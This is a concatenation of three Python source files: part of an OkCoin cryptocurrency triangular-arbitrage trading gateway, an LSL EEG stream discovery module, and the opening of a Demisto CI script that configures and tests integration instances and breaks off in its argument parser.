fp = file(filename, 'a+')
try:
fp.write(loginfo.encode('utf-8') + '\n')
finally:
fp.close()
else:
fp = file(filename, 'wb')
try:
fp.write(loginfo.encode('utf-8') + '\n')
finally:
fp.close()
# ----------------------------------------------------------------------
def prepare(self, symbols):
'''获取盈利空间和转换后的btc交易量'''
# print 'in prepare'
# print self.api.depth
# depth = deepcopy(self.api.depth)
depth = self.api.depth
for s in symbols:
if s not in depth.keys():
return depth, 0, 0
profit = (float(depth[symbols[1]].bidPrice1) * float(depth[symbols[2]].bidPrice1)) / \
float(depth[symbols[0]].askPrice1)
if profit > 1.02: #设置最小盈利空间为1.5%
amount = []
amount.append(float(depth[symbols[0]].askPrice1) * min(float(depth[symbols[0]].askVolume1),
float(depth[symbols[1]].bidVolume1)))
amount.append(float(depth[symbols[2]].bidPrice1) * float(depth[symbols[2]].bidVolume1))
amount.sort()
return depth, profit, amount[0]
else:
return depth, 0, 0
# ----------------------------------------------------------------------
def getAmount(self):
'''获取盈利最大的合约组合,并计算每个合约的交易量'''
depth, profit, amount = self.prepare(self.tradeSymbols)
if amount > 0.002: #设置最小btc交易量为0.002
tradeSymbol = {}
tradeSymbol['symbol'] = self.tradeSymbols
tradeSymbol['profit'] = profit
tradeSymbol['amount'] = amount
tradeSymbol['total'] = profit * amount
self.api.writeLog('=======in getAmount=======')
self.api.writeLog('symbol: %s'% tradeSymbol['symbol'])
print 'profit:', tradeSymbol['profit']
print 'amount:', tradeSymbol['amount']
print 'depth1:', depth[tradeSymbol['symbol'][0]].askPrice1, depth[tradeSymbol['symbol'][0]].askVolume1
print 'depth2:', depth[tradeSymbol['symbol'][1]].bidPrice1, depth[tradeSymbol['symbol'][1]].bidVolume1
print 'depth3:', depth[tradeSymbol['symbol'][2]].bidPrice1, depth[tradeSymbol['symbol'][2]].bidVolume1
if self.api.account['free']['btc'] <= tradeSymbol['amount']:
initAmount = self.api.account['free']['btc']
else:
initAmount = tradeSymbol['amount']
amountDict = {}
amountDict[tradeSymbol['symbol'][0]] = round(initAmount * 0.998 / float(depth[tradeSymbol['symbol'][0]].askPrice1), 8)
amountDict[tradeSymbol['symbol'][1]] = round(amountDict[tradeSymbol['symbol'][0]] * 0.99898, 8)
amountDict[tradeSymbol['symbol'][2]] = round(((amountDict[tradeSymbol['symbol'][1]]*\
float(depth[tradeSymbol['symbol'][1]].bidPrice1) * 0.9989)), 8)
return depth, tradeSymbol['symbol'], amountDict
else:
return depth, [], {}
# ----------------------------------------------------------------------
def tradePolicy_maket(self):
tradeList = []
depth, symbols, amount = self.getAmount()
if symbols == []:
return False
self.api.writeLog('[Start Polocy]')
# if True:
# return
for i in range(20):
if symbols[0] not in tradeList and self.api.account['free']['btc'] >= amount[symbols[0]] * float(depth[symbols[0]].askPrice1):
# print 'step1'
req = VtOrderReq()
req.symbol = symbols[0]
req.priceType = 'buy_market'
# print 'step2'
req.price = round(float(depth[symbols[0]].askPrice1) * amount[symbols[0]] * 0.999, 8)
# print 'step3'
req.volume = ''
# print 'step4'
self.sendOrder(req)
tradeList.append(symbols[0])
if symbols[1] not in tradeList and self.api.account['free'][symbols[1].split('_')[0]] >= amount[symbols[1]] * 0.8:
req = VtOrderReq()
req.symbol = symbols[1]
req.priceType = 'sell_market'
req.price = ''
req.volume = self.api.account['free'][symbols[1].split('_')[0]] * 0.999
self.sendOrder(req)
tradeList.append(symbols[1])
if symbols[2] not in tradeList and self.api.account['free']['eth'] >= amount[symbols[2]] * 0.8:
req = VtOrderReq()
req.symbol = symbols[2]
req.priceType = 'sell_market'
req.price = ''
req.volume = self.api.account['free']['eth'] * 0.999
self.sendOrder(req)
tradeList.append(symbols[2])
if len(tradeList) >= 3 and len(self.api.orderDict) == 0:
self.api.writeLog('[End Policy]succssed complete all trade!')
return
sleep(0.5)
orders = deepcopy(self.api.orderDict)
for id in orders.keys():
req = VtCancelOrderReq
req.symbol = orders[id].symbol
req.orderID = orders[id].orderID
self.cancelOrder(req)
self.api.orderDict.pop(id)
self.api.writeLog('[End Policy]Failed complete all trade!')
# ----------------------------------------------------------------------
def tradePolicy(self):
tradeList = []
depth, symbols, amount = self.getAmount()
if symbols == []:
return False
self.api.writeLog('[Start Polocy]')
# if True:
# return
for i in range(60):
if symbols[0] not in tradeList and self.api.account['free']['btc'] >= amount[symbols[0]] * float(depth[symbols[0]].askPrice1):
# print 'step1'
req = VtOrderReq()
req.symbol = symbols[0]
req.priceType = 'buy'
# print 'step2'
req.price = depth[symbols[0]].askPrice1
# print 'step3'
req.volume = amount[symbols[0]]
# print 'step4'
self.sendOrder(req)
tradeList.append(symbols[0])
if symbols[1] not in tradeList and self.api.account['free'][symbols[1].split('_')[0]] >= amount[symbols[1]] * 0.9:
req = VtOrderReq()
req.symbol = symbols[1]
req.priceType = 'sell'
req.price = depth[symbols[1]].bidPrice1
req.volume = round(self.api.account['free'][symbols[1].split('_')[0]] * 0.9999, 8)
self.sendOrder(req)
tradeList.append(symbols[1])
if symbols[2] not in tradeList and self.api.account['free']['eth'] >= amount[symbols[2]] * 0.9:
req = VtOrderReq()
req.symbol = symbols[2]
req.priceType = 'sell'
req.price = depth[symbols[2]].bidPrice1
req.volume = round(self.api.account['free']['eth'] * 0.9999, 8)
self.sendOrder(req)
tradeList.append(symbols[2])
if len(tradeList) >= 3 and len(self.api.orderDict) == 0:
self.api.writeLog('[End Policy]succssed complete all trade!')
return
sleep(0.5)
orders = deepcopy(self.api.orderDict)
for id in orders.keys():
req = VtCancelOrderReq
req.symbol = orders[id].symbol
req.orderID = orders[id].orderID
self.cancelOrder(req)
self.api.orderDict.pop(id)
sleep(0.5)
req = VtOrderReq()
req.symbol = symbols[1]
req.priceType = 'sell_market'
req.price = ''
req.volume = round(self.api.account['free'][symbols[1].split('_')[0]] * 0.9999, 8)
self.sendOrder(req)
req = VtOrderReq()
req.symbol = symbols[2]
req.priceType = 'sell_market'
req.price = ''
req.volume = self.api.account['free']['eth']
self.sendOrder(req)
self.api.writeLog('[End Policy]Failed complete all trade!')
# ----------------------------------------------------------------------
def registeHandle(self):
'''注册处理机'''
self.eventEngine.register(EVENT_TICK, self.pTick)
self.eventEngine.register(EVENT_ACCOUNT, self.pAccount)
self.eventEngine.register(EVENT_ORDER, self.pOrder)
self.eventEngine.register(EVENT_POSITION, self.pBalance)
########################################################################
class Api(OkCoinApi):
"""OkCoin的API实现"""
#----------------------------------------------------------------------
def __init__(self, gateway):
"""Constructor"""
super(Api, self).__init__()
self.gateway = gateway # gateway对象
self.gatewayName = gateway.gatewayName # gateway对象名称
self.active = True # 若为True则会在断线后自动重连
self.cbDict = {}
self.tickDict = {}
self.orderDict = {}
self.account = {}
self.account['free'] = {}
self.account['freezed'] = {}
self.balance = {}
self.depth = {}
self.tickCount = 0
self.localNo = 0 # 本地委托号
self.localNoQueue = Queue() # 未收到系统委托号的本地委托号队列
self.localNoDict = {} # key为本地委托号,value为系统委托号
self.orderIdDict = {} # key为系统委托号,value为本地委托号
self.cancelDict = {} # key为本地委托号,value为撤单请求
#----------------------------------------------------------------------
def onMessage(self, ws, evt):
"""信息推送"""
data = self.readData(evt)[0]
# print data
channel = data['channel']
callback = self.getCallback(channel)
callback(data)
#----------------------------------------------------------------------
def onError(self, ws, evt):
"""错误推送"""
error = VtErrorData()
error.gatewayName = self.gatewayName
error.errorMsg = str(evt)
self.gateway.onError(error)
#----------------------------------------------------------------------
def onClose(self, ws):
"""接口断开"""
# 如果尚未连上,则忽略该次断开提示
if not self.gateway.connected:
return
self.gateway.connected = False
self.writeLog(u'服务器连接断开')
# 重新连接
if self.active:
def reconnect():
while not self.gateway.connected:
self.writeLog(u'等待10秒后重新连接')
sleep(5)
if not self.gateway.connected:
self.reconnect()
t = Thread(target=reconnect)
t.start()
#----------------------------------------------------------------------
def onOpen(self, ws):
"""连接成功"""
self.gateway.connected = True
self.writeLog(u'服务器连接成功')
# 连接后查询账户和委托数据
self.writeLog(u'登陆')
self.login()
self.writeLog(u'查询账户信息')
self.spotUserInfo()
#
# self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_LTC, '-1')
# self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_BTC, '-1')
# self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_ETH, '-1')
# 连接后订阅现货的成交和账户数据
# self.subscribeSpotTrades('mco_btc')
# self.subscribeSpotUserInfo()
#
# self.subscribeSpotTicker(vnokcoin.SYMBOL_BTC)
# self.subscribeSpotTicker(vnokcoin.SYMBOL_LTC)
# self.subscribeSpotTicker(vnokcoin.SYMBOL_ETH)
a = ['bch']
bs = self.gateway.coins + '_btc'
es = self.gateway.coins + '_eth'
self.subscribeSpotDepth(bs, '5')
self.subscribeSpotDepth(es, '5')
self.subscribeSpotDepth('eth_btc', '5')
# self.subscribeSpotDepth('cmt_btc', '5')
# self.subscribeSpotDepth('ltc_btc', '5')
# self.subscribeSpotDepth(vnokcoin.SYMBOL_LTC, vnokcoin.DEPTH_20)
# self.subscribeSpotDepth(vnokcoin.SYMBOL_ETH, vnokcoin.DEPTH_20)
# 如果连接的是USD网站则订阅期货相关回报数据
# if self.currency == vnokcoin.CURRENCY_USD:
# self.subscribeFutureTrades()
# self.subscribeFutureUserInfo()
# self.subscribeFuturePositions()
# 返回合约信息
# if self.currency == vnokcoin.CURRENCY_CNY:
# l = self.generateCnyContract()
# else:
# l = self.generateUsdContract()
#
# for contract in l:
# contract.gatewayName = self.gatewayName
# self.gateway.onContract(contract)
#----------------------------------------------------------------------
def writeLog(self, content):
"""快速记录日志"""
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = content
print log.logTime,log.logContent
self.gateway.onLog(log)
# ----------------------------------------------------------------------
def getCallback(self, channel):
"""初始化回调函数"""
if channel.endswith('_ticker'):
return self.onTicker
elif channel.endswith('_depth_5'):
return self.onDepth
elif channel.endswith('_userinfo'):
return self.onSpotUserInfo
elif channel.endswith('_orderinfo'):
return self.onSpotOrderInfo
elif channel == 'ok_spot_order':
return self.onSpotTrade
elif channel == 'ok_spot_cancel_order':
return self.onSpotCancelOrder
elif channel.endswith('_order'):
return self.onSpotSubTrades
elif channel.endswith('_balance'):
return self.onSpotSubUserInfo
#----------------------------------------------------------------------
def onTicker(self, data):
""""""
if 'data' not in data:
return
channel = data['channel']
symbol = channelSymbolMap[channel]
if symbol not in self.tickDict:
tick = VtTickData()
tick.symbol = symbol
tick.vtSymbol = symbol
tick.gatewayName = self.gatewayName
self.tickDict[symbol] = tick
else:
tick = self.tickDict[symbol]
rawData = data['data']
tick.highPrice = float(rawData['high'])
tick.lowPrice = float(rawData['low'])
tick.lastPrice = float(rawData['last'])
tick.volume = float(rawData['vol'])
#tick.date, tick.time = generateDateTime(rawData['timestamp'])
newtick = copy(tick)
self.gateway.onTick(newtick)
#----------------------------------------------------------------------
def onDepth(self, data):
""""""
if 'data' not in data:
return
channel = data['channel']
a = channel.split('_')
symbol = str('_'.join((a[3], a[4])))
# symbol = channelSymbolMap[channel]
if symbol not in self.tickDict:
tick = VtTickData()
tick.symbol = symbol
tick.vtSymbol = symbol
tick.gatewayName = self.gatewayName
self.tickDict[symbol] = tick
else:
tick = self.tickDict[symbol]
if 'data' not in data:
return
rawData = data['data']
tick.bidPrice1, tick.bidVolume1 = rawData['bids'][0]
tick.bidPrice2, tick.bidVolume2 = rawData['bids'][1]
tick.bidPrice3, tick.bidVolume3 = rawData['bids'][2]
tick.bidPrice4, tick.bidVolume4 = rawData['bids'][3]
tick.bidPrice5, tick.bidVolume5 = rawData['bids'][4]
tick.askPrice1, tick.askVolume1 = rawData['asks'][-1]
tick.askPrice2, tick.askVolume2 = rawData['asks'][-2]
tick.askPrice3, tick.askVolume3 = rawData['asks'][-3]
tick.askPrice4, tick.askVolume4 = rawData['asks'][-4]
tick.askPrice5, tick.askVolume5 = rawData['asks'][-5]
tick.date, tick.time = generateDateTime(rawData['timestamp'])
newtick = copy(tick)
# self.tickCount += 1
self.depth[symbol] = newtick
# print self.tickCount
# print self.depth
# print self.depth
self.gateway.onTick(newtick)
#----------------------------------------------------------------------
def onSpotUserInfo(self, data):
"""现货账户资金推送"""
rawData = data['data']
# print rawData
info = rawData['info']
funds = rawData['info']['funds']
for coin in funds['freezed']:
self.account['freezed'][coin] = float(funds['freezed'][coin])
self.account['free'][coin] = float(funds['free'][coin])
# print self.account
# # 持仓信息
# for symbol in ['btc', 'ltc','eth', self.currency]:
# if symbol in funds['free']:
# pos = VtPositionData()
# pos.gatewayName = self.gatewayName
#
# pos.symbol = symbol
# pos.vtSymbol = symbol
# pos.vtPositionName = symbol
# # pos.direction = DIRECTION_NET
#
# pos.frozen = float(funds['freezed'][symbol])
# pos.position = pos.frozen + float(funds['free'][symbol])
#
# self.gateway.onPosition(pos)
# 账户资金
account = VtAccountData()
account.gatewayName = self.gatewayName
account.accountID = self.gatewayName
account.vtAccountID = account.accountID
account.balance = float(funds['free']['btc'])
self.gateway.onAccount(account)
#----------------------------------------------------------------------
def onSpotSubUserInfo(self, data):
"""现货账户资金推送"""
rawData = data['data']
funds = rawData['info']
self.writeLog(funds)
for coin in funds['free']:
self.account['freezed'][coin] = float(funds['freezed'][coin])
self.account['free'][coin] = float(funds['free'][coin])
# 持仓信息
# for symbol in funds['free']:
# pos = VtPositionData()
# pos.gatewayName = self.gatewayName
#
# pos.symbol = symbol
# pos.vtSymbol = symbol
# pos.vtPositionName = symbol
# # pos.direction = DIRECTION_NET
#
# pos.frozen = float(funds['freezed'][symbol])
# pos.position = pos.frozen + float(funds['free'][symbol])
# self.gateway.onPosition(pos)
# # 账户资金
# account = VtAccountData()
# account.gatewayName = self.gatewayName
# account.accountID = self.gatewayName
# account.vtAccountID = account.accountID
# account.balance = float(funds['free']['btc'])
# self.gateway.onAccount(account)
#----------------------------------------------------------------------
def onSpotSubTrades(self, data):
"""成交和委托推送"""
if 'data' not in data:
return
rawData = data['data']
if rawData['symbol'] in self.gateway.tradeSymbols:
self.writeLog(rawData)
# 本地和系统委托号
orderId = str(rawData['orderId'])
# 委托信息
if orderId not in self.orderDict.keys():
order = VtOrderData()
order.gatewayName = self.gatewayName
order.symbol = rawData['symbol']
order.vtSymbol = order.symbol
order.orderID = str(rawData['orderId'])
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
order.price = float(rawData['tradeUnitPrice'])
order.totalVolume = float(rawData['tradeAmount'])
order.direction = rawData['tradeType']
self.orderDict[orderId] = order
else:
order = self.orderDict[orderId]
order.tradedVolume = float(rawData['completedTradeAmount'])
order.status = rawData['status']
self.orderDict[orderId] = order
if str(order.status) == '2':
self.orderDict.pop(order.orderID)
self.gateway.onOrder(copy(order))
# 成交信息
# if 'sigTradeAmount' in rawData and float(rawData['sigTradeAmount'])>0:
# trade = VtTradeData()
# trade.gatewayName = self.gatewayName
#
# trade.symbol = rawData['symbol']
# trade.vtSymbol = order.symbol
#
# trade.tradeID = str(rawData['orderId'])
# trade.vtTradeID = '.'.join([self.gatewayName, trade.tradeID])
#
# trade.orderID = str(rawData['orderId'])
# trade.vtOrderID = '.'.join([self.gatewayName, trade.orderID])
#
# trade.price = float(rawData['sigTradePrice'])
# trade.volume = float(rawData['sigTradeAmount'])
#
# trade.direction = rawData['tradeType']
#
# trade.tradeTime = datetime.now().strftime('%H:%M:%S')
#
# self.gateway.onTrade(trade)
#----------------------------------------------------------------------
def onSpotOrderInfo(self, data):
"""委托信息查询回调"""
rawData = data['data']
for d in rawData['orders']:
self.localNo += 1
localNo = str(self.localNo)
orderId = str(d['order_id'])
self.localNoDict[localNo] = orderId
self.orderIdDict[orderId] = localNo
if orderId not in self.orderDict:
order = VtOrderData()
order.gatewayName = self.gatewayName
order.symbol = d['symbol']
order.vtSymbol = order.symbol
order.orderID = localNo
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
order.price = d['price']
order.totalVolume = d['amount']
order.direction = d['type']
self.orderDict[orderId] = order
else:
order = self.orderDict[orderId]
order.tradedVolume = d['deal_amount']
order.status = d['status']
self.orderDict[orderId] = order
# print '==========order============'
# print order.symbol
# print order.orderId
# print order.status
self.gateway.onOrder(copy(order))
#----------------------------------------------------------------------
def generateSpecificContract(self, contract, symbol):
"""生成合约"""
new = copy(contract)
new.symbol = symbol
new.vtSymbol = symbol
new.name = symbol
return new
#----------------------------------------------------------------------
def generateCnyContract(self):
"""生成CNY合约信息"""
contractList = []
contract = VtContractData()
contract.exchange = EXCHANGE_OKCOIN
contract.productClass = PRODUCT_SPOT
contract.size = 1
contract.priceTick = 0.01
contractList.append(self.generateSpecificContract(contract, BTC_CNY_SPOT))
contractList.append(self.generateSpecificContract(contract, LTC_CNY_SPOT))
contractList.append(self.generateSpecificContract(contract, ETH_CNY_SPOT))
return contractList
#----------------------------------------------------------------------
def generateUsdContract(self):
"""生成USD合约信息"""
contractList = []
# 现货
contract = VtContractData()
contract.exchange = EXCHANGE_OKCOIN
contract.productClass = PRODUCT_SPOT
contract.size = 1
contract.priceTick = 0.01
contractList.append(self.generateSpecificContract(contract, BTC_USD_SPOT))
contractList.append(self.generateSpecificContract(contract, LTC_USD_SPOT))
contractList.append(self.generateSpecificContract(contract, ETH_USD_SPOT))
# 期货
contract.productClass = PRODUCT_FUTURES
contractList.append(self.generateSpecificContract(contract, BTC_USD_THISWEEK))
contractList.append(self.generateSpecificContract(contract, BTC_USD_NEXTWEEK))
contractList.append(self.generateSpecificContract(contract, BTC_USD_QUARTER))
contractList.append(self.generateSpecificContract(contract, LTC_USD_THISWEEK))
contractList.append(self.generateSpecificContract(contract, LTC_USD_NEXTWEEK))
contractList.append(self.generateSpecificContract(contract, LTC_USD_QUARTER))
contractList.append(self.generateSpecificContract(contract, ETH_USD_THISWEEK))
contractList.append(self.generateSpecificContract(contract, ETH_USD_NEXTWEEK))
contractList.append(self.generateSpecificContract(contract, ETH_USD_QUARTER))
return contractList
#----------------------------------------------------------------------
def onSpotTrade(self, data):
"""委托回报"""
print 'onSpotTrade', data
rawData = data['data']
if 'order_id' not in rawData:
self.writeLog('[order]error_code:%s' % str(rawData['error_code']))
orderId = rawData['order_id']
# print orderId
# 尽管websocket接口的委托号返回是异步的,但经过测试是
# 符合先发现回的规律,因此这里通过queue获取之前发送的
# 本地委托号,并把它和推送的系统委托号进行映射
# localNo = self.localNoQueue.get_nowait()
# self.localNoDict[localNo] = orderId
# self.orderIdDict[orderId] = localNo
# 检查是否有系统委托号返回前就发出的撤单请求,若有则进
# 行撤单操作
# if localNo in self.cancelDict:
# req = self.cancelDict[localNo]
# self.spotCancel(req)
# del self.cancelDict[localNo]
#----------------------------------------------------------------------
def onSpotCancelOrder(self, data):
"""撤单回报"""
pass
#----------------------------------------------------------------------
def spotSendOrder(self, req):
"""发单"""
self.spotTrade(req.symbol, req.priceType, str(req.price), str(req.volume))
self.writeLog('[SendOrder]%s|%s|%s|%s' % (req.symbol, req.priceType, str(req.price), str(req.volume)))
# 本地委托号加1,并将对应字符串保存到队列中,返回基于本地委托号的vtOrderID
self.localNo += 1
self.localNoQueue.put(str(self.localNo))
vtOrderID = '.'.join([self.gatewayName, str(self.localNo)])
return vtOrderID
#----------------------------------------------------------------------
def spotCancel(self, req):
"""撤单"""
symbol = req.symbol
self.spotCancelOrder(req.symbol, req.orderID)
self.writeLog('[CancelOrder]%s|%s' % (req.symbol, req.orderID))
#----------------------------------------------------------------------
def generateDateTime(s):
"""生成时间"""
dt = datetime.fromtimestamp(float(s)/1e3)
time = dt.strftime("%H:%M:%S.%f")
date = dt.strftime("%Y%m%d")
return date, time
|
discovery.py | """
Discovery Module for LSL stream discovery and data retrieval
"""
import logging
from threading import current_thread, Thread
from pylsl import resolve_bypred, LostError, TimeoutError, resolve_streams
from .stream import Stream
class Discovery:
"""
Class representing the available LSL stream information and incoming data
"""
def __init__(self, **options):
"""
:param options: additional arguments for creating Stream object
"""
self.logger = logging.getLogger(__name__)
self.options = options
self.sample_rate = None
self.channel_count = None
self.streams_by_uid = {}
self.running = False
self.thread = None
def start(self):
"""
Start the thread to resolve LSL streams
"""
if self.thread:
return False
self.thread = Thread(target=self._refresh, daemon=True, name="Discovery")
self.running = True
self.thread.start()
return True
def stop(self):
"""
Stop LSL stream search
"""
if not self.thread:
return True
self.running = False
if current_thread() is not self.thread:
self.thread.join()
self.thread = None
return True
def streams(self):
"""
:return: a list of Stream objects
"""
return list(self.streams_by_uid.values())
def _refresh(self):
while self.running:
self._resolve()
def _resolve(self):
"""
Search for available EEG streams on LSL and connect to them by saving them as Stream objects
"""
# resolve EEG streams and retrieve their information
streams_info = resolve_bypred("type='EEG'", 0, 2.5)
streams_active = []
self.logger.debug("Found {} available streams".format(len(streams_info)))
# iterate for each stream
for stream_info in streams_info:
# uid = stream_info.source_id() if stream_info.source_id() else stream_info.uid() # retrieve 'source_id'
uid = stream_info.source_id() + ' | ' +stream_info.uid()
streams_active.append(uid)
# if the current stream has not been saved, then connect to the current stream
if uid not in self.streams_by_uid:
if self._validate_stream_signature(stream_info):
self._connect_to(uid, stream_info)
# if the current stream is already saved, but is not running, then disconnect
if uid in self.streams_by_uid:
if self.streams_by_uid[uid].running == False:
self._disconnect_from({uid})
self._disconnect_from(list(set(self.streams_by_uid.keys()) - set(streams_active)))
def _validate_stream_signature(self, stream_info):
"""
checking if the input stream's sampling rate and channel count match those of the previous stream
:param stream_info: current stream information
"""
if self.sample_rate and self.sample_rate != stream_info.nominal_srate():
return False
if self.channel_count and self.channel_count != stream_info.channel_count():
return False
return True
def _connect_to(self, uid, stream_info):
"""
Connect to the stream using the stream information
:param uid: the stream ID, i.e., 'source_id'
:param stream_info: stream information
"""
stream = None
try:
self.logger.info("{}: Discovered at {}hz with {} channels, connecting".format(stream_info.name(), stream_info.nominal_srate(), stream_info.channel_count()))
# create the Stream object using retrieved stream information
stream = Stream(uid, stream_info, **self.options)
stream.start() # start the Stream thread
self.logger.warning("{}: Connected".format(stream_info.name()))
except (LostError, TimeoutError):
self.logger.warning("{}: Could not connect".format(stream_info.name()))
if stream:
if len(self.streams_by_uid) == 0:
self.sample_rate = stream.sample_rate
self.channel_count = stream.channel_count
self.logger.info("{}: Elected master stream at {}hz with {} channels".format(stream.name, stream.sample_rate, stream.channel_count))
self.streams_by_uid[uid] = stream
def _disconnect_from(self, inactive_uids):
"""
Disconnect from streams using their IDs
:param inactive_uids: inactive streams' IDs
"""
for uid in inactive_uids:
if self.streams_by_uid[uid].running:
self.logger.info("{}: Disconnected, killing thread".format(self.streams_by_uid[uid].name))
self.streams_by_uid[uid].stop()
else:
self.logger.info("{}: Killed, cleaning up".format(self.streams_by_uid[uid].name))
del self.streams_by_uid[uid]
if len(self.streams_by_uid) == 0:
self.sample_rate = None
self.channel_count = None
|
configure_and_test_integration_instances.py | from __future__ import print_function
import argparse
import ast
import json
import logging
import os
import subprocess
import sys
import uuid
import zipfile
from datetime import datetime
from distutils.version import LooseVersion
from enum import IntEnum
from pprint import pformat
from threading import Thread
from time import sleep
from typing import List, Tuple
import demisto_client
from demisto_sdk.commands.test_content.constants import SSH_USER
from ruamel import yaml
from Tests.Marketplace.search_and_install_packs import search_and_install_packs_and_their_dependencies, \
install_all_content_packs, upload_zipped_packs, install_all_content_packs_for_nightly
from Tests.scripts.utils.log_util import install_logging
from Tests.test_content import extract_filtered_tests, get_server_numeric_version
from Tests.test_integration import __get_integration_config, __test_integration_instance, disable_all_integrations
from Tests.tools import run_with_proxy_configured
from Tests.update_content_data import update_content
from demisto_sdk.commands.common.constants import FileType
from demisto_sdk.commands.common.tools import run_threads_list, run_command, get_yaml, \
str2bool, format_version, find_type
from demisto_sdk.commands.test_content.mock_server import MITMProxy, run_with_mock, RESULT
from demisto_sdk.commands.test_content.tools import update_server_configuration, is_redhat_instance
from demisto_sdk.commands.validate.validate_manager import ValidateManager
MARKET_PLACE_MACHINES = ('master',)
SKIPPED_PACKS = ['NonSupported', 'ApiModules']
NO_PROXY = ','.join([
'oproxy.demisto.ninja',
'oproxy-dev.demisto.ninja',
])
NO_PROXY_CONFIG = {'python.pass.extra.keys': f'--env##no_proxy={NO_PROXY}'} # noqa: E501
DOCKER_HARDENING_CONFIGURATION = {
'docker.cpu.limit': '1.0',
'docker.run.internal.asuser': 'true',
'limit.docker.cpu': 'true',
'python.pass.extra.keys': f'--memory=1g##--memory-swap=-1##--pids-limit=256##--ulimit=nofile=1024:8192##--env##no_proxy={NO_PROXY}', # noqa: E501
'powershell.pass.extra.keys': f'--env##no_proxy={NO_PROXY}',
}
DOCKER_HARDENING_CONFIGURATION_FOR_PODMAN = {
'docker.run.internal.asuser': 'true'
}
MARKET_PLACE_CONFIGURATION = {
'content.pack.verify': 'false',
'marketplace.initial.sync.delay': '0',
'content.pack.ignore.missing.warnings.contentpack': 'true'
}
AVOID_DOCKER_IMAGE_VALIDATION = {
'content.validate.docker.images': 'false'
}
ID_SET_PATH = './Tests/id_set.json'
class Running(IntEnum):
CIRCLECI_RUN = 0
WITH_OTHER_SERVER = 1
WITH_LOCAL_SERVER = 2
class Server:
def __init__(self, internal_ip, port, user_name, password):
self.__ssh_client = None
self.__client = None
self.internal_ip = internal_ip
self.ssh_tunnel_port = port
self.user_name = user_name
self.password = password
def __str__(self):
return self.internal_ip
@property
def client(self):
if self.__client is None:
self.__client = self.reconnect_client()
return self.__client
def reconnect_client(self):
self.__client = demisto_client.configure(f'https://localhost:{self.ssh_tunnel_port}',
verify_ssl=False,
username=self.user_name,
password=self.password)
return self.__client
def add_server_configuration(self, config_dict, error_msg, restart=False):
update_server_configuration(self.client, config_dict, error_msg)
if restart:
self.exec_command('sudo systemctl restart demisto')
def exec_command(self, command):
subprocess.check_output(f'ssh {SSH_USER}@{self.internal_ip} {command}'.split(),
stderr=subprocess.STDOUT)
def get_id_set(id_set_path) -> dict:
"""
Used to collect the ID set so it can be passed to the Build class on init.
:return: ID set as a dict if it exists.
"""
if os.path.isfile(id_set_path):
return get_json_file(id_set_path)
class Build:
# START CHANGE ON LOCAL RUN #
content_path = '{}/project'.format(os.getenv('HOME'))
test_pack_target = '{}/project/Tests'.format(os.getenv('HOME'))
key_file_path = 'Use in case of running with non local server'
run_environment = Running.CIRCLECI_RUN
env_results_path = './env_results.json'
DEFAULT_SERVER_VERSION = '99.99.98'
# END CHANGE ON LOCAL RUN #
def __init__(self, options):
self._proxy = None
self.git_sha1 = options.git_sha1
self.branch_name = options.branch
self.ci_build_number = options.build_number
self.is_nightly = options.is_nightly
self.ami_env = options.ami_env
self.server_to_port_mapping, self.server_numeric_version = self.get_servers(options.ami_env)
self.secret_conf = get_json_file(options.secret)
self.username = options.user if options.user else self.secret_conf.get('username')
self.password = options.password if options.password else self.secret_conf.get('userPassword')
self.servers = [Server(internal_ip,
port,
self.username,
self.password) for internal_ip, port in self.server_to_port_mapping.items()]
self.is_private = options.is_private
conf = get_json_file(options.conf)
self.tests = conf['tests']
self.skipped_integrations_conf = conf['skipped_integrations']
self.unmockable_integrations = conf['unmockable_integrations']
id_set_path = options.id_set_path if options.id_set_path else ID_SET_PATH
self.id_set = get_id_set(id_set_path)
self.test_pack_path = options.test_pack_path if options.test_pack_path else None
self.tests_to_run = self.fetch_tests_list(options.tests_to_run)
self.content_root = options.content_root
self.pack_ids_to_install = self.fetch_pack_ids_to_install(options.pack_ids_to_install)
self.service_account = options.service_account
@property
def proxy(self) -> MITMProxy:
"""
A property method that should create and return a single proxy instance through out the build
Returns:
The single proxy instance that should be used in this build.
"""
if not self._proxy:
self._proxy = MITMProxy(self.servers[0].internal_ip,
logging_module=logging,
build_number=self.ci_build_number,
branch_name=self.branch_name)
return self._proxy
@staticmethod
def fetch_tests_list(tests_to_run_path: str):
"""
Fetches the test list from the filter.
:param tests_to_run_path: Path to location of test filter.
:return: List of tests if there are any, otherwise empty list.
"""
tests_to_run = []
with open(tests_to_run_path, "r") as filter_file:
tests_from_file = filter_file.readlines()
for test_from_file in tests_from_file:
test_clean = test_from_file.rstrip()
tests_to_run.append(test_clean)
return tests_to_run
@staticmethod
def fetch_pack_ids_to_install(packs_to_install_path: str):
"""
Fetches the test list from the filter.
:param packs_to_install_path: Path to location of pack IDs to install file.
:return: List of Pack IDs if there are any, otherwise empty list.
"""
tests_to_run = []
with open(packs_to_install_path, "r") as filter_file:
tests_from_file = filter_file.readlines()
for test_from_file in tests_from_file:
test_clean = test_from_file.rstrip()
tests_to_run.append(test_clean)
return tests_to_run
@staticmethod
def get_servers(ami_env):
env_conf = get_env_conf()
server_to_port_mapping = map_server_to_port(env_conf, ami_env)
if Build.run_environment == Running.CIRCLECI_RUN:
server_numeric_version = get_server_numeric_version(ami_env)
else:
server_numeric_version = Build.DEFAULT_SERVER_VERSION
return server_to_port_mapping, server_numeric_version
def options_handler():
parser = argparse.ArgumentParser(description='Utility for instantiating and testing integration instances')
parser.add_argument('-u', '--user', help='The username for the login', required=True)
parser.add_argument('-p', '--password', help='The password for the login', required=True)
parser.add_argument('--ami_env', help='The AMI environment for the current run. Options are '
'"Server Master", "Server 5.0". '
'The server url is determined by the AMI environment.')
parser.add_argument('-g', '--git_sha1', help='commit sha1 to compare changes with')
parser.add_argument('-c', '--conf', help='Path to conf file', required=True)
parser.add_argument('-s', '--secret', help='Path to secret conf file')
parser.add_argument('-n', '--is-nightly', type=str2bool, help='Is nightly build')
parser.add_argument('-pr', '--is_private', type=str2bool, help='Is private build')
parser.add_argument('--branch', help='GitHub branch name', required=True)
parser.add_argument('--build-number', help='CI job number where the instances were created', required=True)
parser.add_argument('--test_pack_path', help='Path to where the test pack will be saved.',
default='/home/runner/work/content-private/content-private/content/artifacts/packs')
parser.add_argument('--content_root', help='Path to the content root.',
default='/home/runner/work/content-private/content-private/content')
